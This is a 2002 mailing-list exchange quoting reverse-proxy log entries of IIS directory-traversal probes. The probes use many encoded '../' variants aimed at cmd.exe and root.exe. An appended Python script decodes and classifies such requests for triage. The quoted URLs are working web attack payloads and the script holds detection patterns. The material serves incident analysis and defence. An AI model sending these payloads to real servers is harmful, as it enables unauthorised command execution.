From: Herman L. Knief (herman_at_knief.net)
Date: Thu Oct 10 2002 - 17:15:30 CDT
Either that, or some script kiddie is trying out one of the many exploits
on your site... not smart enough to realize that he's not hitting an IIS
server.
- Herman
On Fri, 11 Oct 2002 mailinglists belfin.ch wrote:
->Hello
->
->our reverse proxy picked this up
->
->1034211881.427 22 217.11.99.90 TCP_MISS/503 1166 GET
->http://www/scripts/..%c1%1c../winnt/system32/cmd.exe? - NONE/- -
->1034211881.925 13 217.11.99.90 TCP_MISS/503 1166 GET
->http://www/scripts/..%c0%2f../winnt/system32/cmd.exe? - NONE/- -
->1034211882.393 19 217.11.99.90 TCP_MISS/503 1166 GET
->http://www/scripts/..%c0%af../winnt/system32/cmd.exe? - NONE/- -
->1034211882.852 10 217.11.99.90 TCP_MISS/503 1166 GET
->http://www/scripts/..%c1%9c../winnt/system32/cmd.exe? - NONE/- -
->1034211883.297 5 217.11.99.90 TCP_MISS/503 1168 GET
->http://www/scripts/..%%35%63../winnt/system32/cmd.exe? - NONE/- -
->1034211883.836 20 217.11.99.90 TCP_MISS/503 1164 GET
->http://www/scripts/..%%35c../winnt/system32/cmd.exe? - NONE/- -
->1034211887.664 22 217.11.99.90 TCP_MISS/503 1172 GET
->http://www/scripts/..%25%35%63../winnt/system32/cmd.exe? - NONE/- -
->1034211888.285 19 217.11.99.90 TCP_MISS/503 1164 GET
->http://www/scripts/..%252f../winnt/system32/cmd.exe? - NONE/- -
->1034215688.223 16 217.11.99.90 TCP_MISS/503 1116 GET
->http://www/scripts/root.exe? - NONE/- -
->1034215689.027 29 217.11.99.90 TCP_MISS/503 1112 GET
->http://www/MSADC/root.exe? - NONE/- -
->1034215689.564 13 217.11.99.90 TCP_MISS/503 1132 GET
->http://www/c/winnt/system32/cmd.exe? - NONE/- -
->1034215690.138 3 217.11.99.90 TCP_MISS/503 1132 GET
->http://www/d/winnt/system32/cmd.exe? - NONE/- -
->1034215690.962 20 217.11.99.90 TCP_MISS/503 1164 GET
->http://www/scripts/..%255c../winnt/system32/cmd.exe? - NONE/- -
->1034215691.552 27 217.11.99.90 TCP_MISS/503 1206 GET
->http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe? -
->NONE/- -
->1034215692.265 19 217.11.99.90 TCP_MISS/503 1206 GET
->http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe? -
->NONE/- -
->1034215693.017 10 217.11.99.90 TCP_MISS/503 1262 GET
->http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c.
->./winnt/s
->
->Is there some new IIS/Windows worm spreading?
->
->Thanks,
->Philipp
->
->
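An added example, not part of the original thread: a small Python triage of Squid access-log lines like those quoted above, which percent-decodes the request path until it stops changing and folds two-byte overlong sequences, so the differently encoded `../` variants collapse to one form. The sample lines, the 192.0.2.10 client address and the function names are constructed for illustration, and the lenient fold of 0xC0/0xC1 sequences is an assumption about how a permissive decoder treats those bytes.

```python
import re
from urllib.parse import unquote_to_bytes, urlsplit

# Two-byte sequences starting with 0xC0/0xC1 are never valid UTF-8; a lenient
# decoder (assumed here) folds them to ASCII, e.g. C0 AF -> "/", C1 9C -> "\".
OVERLONG = re.compile(rb"[\xc0\xc1][\x00-\xff]")

def percent_decode_fully(raw, max_rounds=5):
    """Percent-decode until nothing changes; return (bytes, rounds that changed)."""
    data = raw.encode("utf-8")
    for rounds in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            return data, rounds
        data = decoded
    return data, max_rounds

def fold_overlong(data):
    """Collapse each C0/C1-led pair to the single ASCII byte it would decode to."""
    return OVERLONG.sub(
        lambda m: bytes([(m[0][0] & 0x1F) << 6 | (m[0][1] & 0x3F)]), data)

def classify(line):
    """Return sorted findings for one Squid access.log line (URL is field 7)."""
    path = urlsplit(line.split()[6]).path
    data, rounds = percent_decode_fully(path)
    folded = fold_overlong(data)
    norm = folded.replace(b"\\", b"/").lower()
    findings = set()
    if b"/../" in norm and "/../" not in path:
        findings.add("encoded-traversal")      # traversal only visible after decoding
    if rounds > 1:
        findings.add("multi-layer-encoding")   # e.g. %255c or %%35c
    if folded != data:
        findings.add("overlong-utf8")          # e.g. %c0%af or %c1%1c
    if norm.endswith((b"/cmd.exe", b"/root.exe")):
        findings.add("shell-binary")
    return sorted(findings)

# Constructed sample lines in the format of the quoted log (one entry per line).
SAMPLE = [
    "1034211882.393 19 192.0.2.10 TCP_MISS/503 1166 GET http://www/scripts/..%c0%af../winnt/system32/cmd.exe? - NONE/- -",
    "1034211883.836 20 192.0.2.10 TCP_MISS/503 1164 GET http://www/scripts/..%%35c../winnt/system32/cmd.exe? - NONE/- -",
    "1034215688.223 16 192.0.2.10 TCP_MISS/503 1116 GET http://www/scripts/root.exe? - NONE/- -",
    "1034215700.001 12 192.0.2.10 TCP_MISS/200 2048 GET http://www/index.html - NONE/- -",
]

if __name__ == "__main__":
    for entry in SAMPLE:
        print(classify(entry), entry.split()[6])
```
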